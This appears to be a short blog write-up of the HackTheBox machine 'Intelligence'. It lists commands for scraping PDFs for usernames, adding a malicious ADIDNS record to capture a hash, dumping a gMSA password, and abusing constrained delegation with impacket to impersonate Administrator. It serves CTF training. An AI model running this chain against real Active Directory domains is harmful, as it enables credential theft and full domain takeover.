Post

Password Spraying, gMSA, ADIDNS & Constrained Delegation - Intelligence @ HackTheBox

We are solving intelligence, a nice Windows machine on HackTheBox, created by Micah. For user, we will enumerate pdfs on a webserver & will use both the content & metadata to find valid credentials of a domain user. For root, we update a DNS entry, steal a hash & dump a GMSA password. Finally, we will exploit constrained delegation with impacket to get an administrator ticket.

Notes

Handle PDFs:

1
2
3
4
5
for d in $(seq -f "%02g" 1 31); do for m in $(seq -f "%02g" 1 12); do wget -nv http://intelligence.htb/documents/2020-$m-$d-upload.pdf 2>/dev/null; done; done

for f in *.pdf; do pdftotext $f - >> output.txt; done

for f in *.pdf; do exiftool $f | grep Creator | awk -F ': ' '{print $2}' >> users.txt; done

Set DNS Entry:

1
python3 dnstool.py -u 'INTELLIGENCE\Tiffany.Molina' -p '' -a add -r 'webxct' -d '10.10.14.13'  10.129.193.97

Bloodhound:

1
bloodhound-python -c all -u Ted.Graves -p '' -d intelligence.htb -dc dc.intelligence.htb -ns 10.129.193.97 --disable-pooling -w1 --dns-timeout 30

Dump gMSA Passwords from Linux:

1
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb

Constrained Delegation:

1
impacket-getST -spn www/dc.intelligence.htb 'intelligence.htb/svc_int$' -hashes :''-impersonate Administrator -dc-ip 10.129.193.97 

Links:

https://github.com/dirkjanm/krbrelayx

https://github.com/micahvandeusen/gMSADumper

This post is licensed under CC BY 4.0 by the author.